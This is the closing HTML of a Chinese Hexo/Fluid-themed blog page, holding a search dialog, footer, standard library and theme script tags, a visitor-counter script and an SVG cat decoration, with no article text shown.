  



  



  







    

    
      <a id="scroll-top-button" aria-label="TOP" href="#" role="button">
        <i class="iconfont icon-arrowup" aria-hidden="true"></i>
      </a>
    

    
      <div class="modal fade" id="modalSearch" tabindex="-1" role="dialog" aria-labelledby="ModalLabel"
     aria-hidden="true">
  <div class="modal-dialog modal-dialog-scrollable modal-lg" role="document">
    <div class="modal-content">
      <div class="modal-header text-center">
        <h4 class="modal-title w-100 font-weight-bold">搜索</h4>
        <button type="button" id="local-search-close" class="close" data-dismiss="modal" aria-label="Close">
          <span aria-hidden="true">&times;</span>
        </button>
      </div>
      <div class="modal-body mx-3">
        <div class="md-form mb-5">
          <input type="text" id="local-search-input" class="form-control validate">
          <label data-error="x" data-success="v" for="local-search-input">关键词</label>
        </div>
        <div class="list-group" id="local-search-result"></div>
      </div>
    </div>
  </div>
</div>

    

    
  </main>

  <footer>
    <div class="footer-inner">
  
    <div class="footer-content">
       <a href="https://hexo.io" target="_blank" rel="nofollow noopener"><span>Hexo</span></a> <i class="iconfont icon-love"></i> <a href="https://github.com/fluid-dev/hexo-theme-fluid" target="_blank" rel="nofollow noopener"><span>Fluid</span></a> 
    </div>
  
  
  
</div>

  </footer>

  <!-- Scripts -->
  
  <script  src="https://lib.baomitu.com/nprogress/0.2.0/nprogress.min.js" ></script>
  <link  rel="stylesheet" href="https://lib.baomitu.com/nprogress/0.2.0/nprogress.min.css" />

  <script>
    NProgress.configure({"showSpinner":false,"trickleSpeed":100})
    NProgress.start()
    window.addEventListener('load', function() {
      NProgress.done();
    })
  </script>


<script  src="https://lib.baomitu.com/jquery/3.6.4/jquery.min.js" ></script>
<script  src="https://lib.baomitu.com/twitter-bootstrap/4.6.1/js/bootstrap.min.js" ></script>
<script  src="/js/events.js" ></script>
<script  src="/js/plugins.js" ></script>


  <script  src="https://lib.baomitu.com/typed.js/2.0.12/typed.min.js" ></script>
  <script>
    (function (window, document) {
      var typing = Fluid.plugins.typing;
      var subtitle = document.getElementById('subtitle');
      if (!subtitle || !typing) {
        return;
      }
      var text = subtitle.getAttribute('data-typed-text');
      
        typing(text);
      
    })(window, document);
  </script>




  
    <script  src="/js/img-lazyload.js" ></script>
  




  
<script>
  Fluid.utils.createScript('https://lib.baomitu.com/tocbot/4.20.1/tocbot.min.js', function() {
    var toc = jQuery('#toc');
    if (toc.length === 0 || !window.tocbot) { return; }
    var boardCtn = jQuery('#board-ctn');
    var boardTop = boardCtn.offset().top;

    window.tocbot.init(Object.assign({
      tocSelector     : '#toc-body',
      contentSelector : '.markdown-body',
      linkClass       : 'tocbot-link',
      activeLinkClass : 'tocbot-active-link',
      listClass       : 'tocbot-list',
      isCollapsedClass: 'tocbot-is-collapsed',
      collapsibleClass: 'tocbot-is-collapsible',
      scrollSmooth    : true,
      includeTitleTags: true,
      headingsOffset  : -boardTop,
    }, CONFIG.toc));
    if (toc.find('.toc-list-item').length > 0) {
      toc.css('visibility', 'visible');
    }

    Fluid.events.registerRefreshCallback(function() {
      if ('tocbot' in window) {
        tocbot.refresh();
        var toc = jQuery('#toc');
        if (toc.length === 0 || !tocbot) {
          return;
        }
        if (toc.find('.toc-list-item').length > 0) {
          toc.css('visibility', 'visible');
        }
      }
    });
  });
</script>


  <script src=https://lib.baomitu.com/clipboard.js/2.0.11/clipboard.min.js></script>

  <script>Fluid.plugins.codeWidget();</script>


  
<script>
  Fluid.utils.createScript('https://lib.baomitu.com/anchor-js/5.0.0/anchor.min.js', function() {
    window.anchors.options = {
      placement: CONFIG.anchorjs.placement,
      visible  : CONFIG.anchorjs.visible
    };
    if (CONFIG.anchorjs.icon) {
      window.anchors.options.icon = CONFIG.anchorjs.icon;
    }
    var el = (CONFIG.anchorjs.element || 'h1,h2,h3,h4,h5,h6').split(',');
    var res = [];
    for (var item of el) {
      res.push('.markdown-body > ' + item.trim());
    }
    if (CONFIG.anchorjs.placement === 'left') {
      window.anchors.options.class = 'anchorjs-link-left';
    }
    window.anchors.add(res.join(', '));

    Fluid.events.registerRefreshCallback(function() {
      if ('anchors' in window) {
        anchors.removeAll();
        var el = (CONFIG.anchorjs.element || 'h1,h2,h3,h4,h5,h6').split(',');
        var res = [];
        for (var item of el) {
          res.push('.markdown-body > ' + item.trim());
        }
        if (CONFIG.anchorjs.placement === 'left') {
          anchors.options.class = 'anchorjs-link-left';
        }
        anchors.add(res.join(', '));
      }
    });
  });
</script>


  
<script>
  Fluid.utils.createScript('https://lib.baomitu.com/fancybox/3.5.7/jquery.fancybox.min.js', function() {
    Fluid.plugins.fancyBox();
  });
</script>


  <script>Fluid.plugins.imageCaption();</script>

  <script  src="/js/local-search.js" ></script>





<!-- 主题的启动项，将它保持在最底部 -->
<!-- the boot of the theme, keep it at the bottom -->
<script  src="/js/boot.js" ></script>


  

  <noscript>
    <div class="noscript-warning">博客在允许 JavaScript 运行的环境下浏览效果更佳</div>
  </noscript>
<!-- hexo injector body_end start --><script src="/js/navbar-hide.js"></script><script src="/js/runtime.js"></script><script async src="//busuanzi.ibruce.info/busuanzi/2.3/busuanzi.pure.mini.js"></script>
  <div id="corner-cat" aria-hidden="true">
    <div class="cat-svg-wrap">
      <svg class="cat-svg" viewBox="0 0 140 90" xmlns="http://www.w3.org/2000/svg">
        <g class="cat-tail">
          <path d="M112 54 C128 42, 132 30, 122 18 C136 24, 138 42, 126 56"
                fill="none" stroke="currentColor" stroke-width="6" stroke-linecap="round"/>
        </g>

        <g class="cat-body-main">
          <ellipse cx="72" cy="52" rx="34" ry="22" fill="currentColor" opacity="0.16"/>
          <ellipse cx="70" cy="48" rx="30" ry="20" fill="currentColor"/>
          <circle cx="42" cy="42" r="16" fill="currentColor"/>

          <path d="M31 31 L36 18 L43 31 Z" fill="currentColor"/>
          <path d="M41 31 L48 18 L52 32 Z" fill="currentColor"/>

          <path d="M35 42 h4" class="cat-eye left-eye"/>
          <path d="M45 42 h4" class="cat-eye right-eye"/>

          <circle cx="41.5" cy="46.5" r="1.2" fill="#f6c2d8"/>
          <path d="M39 49 Q41.5 51 44 49" class="cat-mouth"/>

          <path d="M28 46 h-10" class="cat-whisker"/>
          <path d="M28 49 h-9" class="cat-whisker"/>
          <path d="M55 46 h10" class="cat-whisker"/>
          <path d="M55 49 h9" class="cat-whisker"/>

          <g class="cat-legs">
            <path d="M56 63 v12" class="cat-leg"/>
            <path d="M68 65 v12" class="cat-leg"/>
            <path d="M82 65 v12" class="cat-leg"/>
            <path d="M94 63 v12" class="cat-leg"/>
          </g>
        </g>
      </svg>
    </div>
  </div>

  <div class="anime-footer-wrap">
    <div class="anime-footer">
      <div class="footer-line"><span id="runtime"></span></div>
      <div class="footer-line typing" id="footer-typing"></div>
      <div class="footer-line small">
        © 2026 AzumiSaki · Powered by Hexo & Fluid
      </div>
    </div>
  </div>

  <script src="/js/footer.js"></script>
  <script src="/js/falling.js"></script>
  <script src="/js/corner-cat.js"></script>
  
  <div id="corner-cat" aria-hidden="true">
    <div class="cat-body">(=^-ω-^=)</div>
  </div>

  <script src="/js/footer.js"></script>
  <script src="/js/falling.js"></script>
  <script src="/js/corner-cat.js"></script>
  <script async src="//busuanzi.ibruce.info/busuanzi/2.3/busuanzi.pure.mini.js"></script>
  <!-- hexo injector body_end end --></body>
</html>
